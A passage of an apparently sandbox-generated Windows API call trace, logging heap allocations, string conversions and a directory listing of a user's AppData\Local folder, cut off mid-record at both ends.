RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0152.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0152.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.468] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0152.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aa9f88 [0152.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aa9f88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0152.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fc00 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa000 [0152.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Local", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0152.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77af8 [0152.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Local", cchWideChar=30, lpMultiByteStr=0x2a77af8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy/AppData/Local", lpUsedDefaultChar=0x0) returned 30 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3c) returned 0x2a5de88 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0152.469] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77d00, cbMultiByte=30, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3c) returned 0x2a5dfa8 [0152.469] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77d00, cbMultiByte=30, lpWideCharStr=0x2a5dfa8, cchWideChar=30 | out: lpWideCharStr="C:\\Users\\FD1HVy/AppData/Local") returned 30 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fc00 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68430 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.470] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0152.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.471] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.471] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0152.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0152.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f6ee0 [0152.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f6ee0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a684b8 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fe8 [0152.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0152.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684b8 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.473] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaa80 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0152.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e20b8 [0152.524] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0152.524] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0152.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0152.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7020 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaa80 | out: hHeap=0x2af0000) returned 1 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | 